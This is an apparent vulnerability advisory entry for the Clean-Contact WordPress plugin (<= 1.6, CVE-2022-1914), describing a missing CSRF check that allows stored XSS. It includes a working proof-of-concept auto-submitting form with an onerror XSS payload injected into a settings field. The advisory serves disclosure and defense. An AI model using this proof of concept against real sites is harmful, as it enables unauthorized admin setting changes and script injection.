Lucene search
Daniel RufWPEX-ID:8C8DAD47-8591-47DC-B84F-8C5CB18B2D78HistoryJun 01, 2022 - 12:00 a.m.
Clean-Contact <= 1.6 - Arbitrary Settings Update to Stored XSS via CSRF
2022-06-0100:00:00
Daniel Ruf
80
stored xss
csrf
clean-contact
arbitrary settings update
EPSS
0.001
Percentile
25.9%
The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack and lead to Stored XSS due to the lack of sanitisation and escaping as well
<form id="test" action="https://example.com/wp-admin/plugins.php?page=clean_contact" method="POST">
<input type="text" name="clean_contact_settings" value="1">
<input type="text" name="clean_contact_email" value='[email protected]"><img src onerror=alert(/XSS/)>'>
<input type="text" name="clean_contact_cc" value="">
<input type="text" name="clean_contact_bcc" value="[email protected]">
<input type="text" name="clean_contact_prefix" value="clean-contact">
<input type="text" name="clean_contact_thanks" value="Thank you. Message sent!">
<input type="text" name="clean_contact_thanks_url" value="https://example.com">
<input type="text" name="clean_contact_from_email" value="">
<input type="text" name="Submit" value="Save Settings">
</form>
<script>
document.getElementById("test").submit();
</script>Related
wpvulndb
wpvulndb
Clean-Contact <= 1.6 - Arbitrary Settings Update to Stored XSS via CSRF
2022-06-01 00:00:00
prion
prion
Cross site request forgery (csrf)
2022-06-27 09:15:00
patchstack
patchstack
cnvd
cnvd
WordPress Clean-Contact plugin跨站请求伪造漏洞
2022-06-30 00:00:00
nvd
nvd
CVE-2022-1914
2022-06-27 09:15:10
cvelist
cvelist
cve
cve
CVE-2022-1914
2022-06-27 09:15:10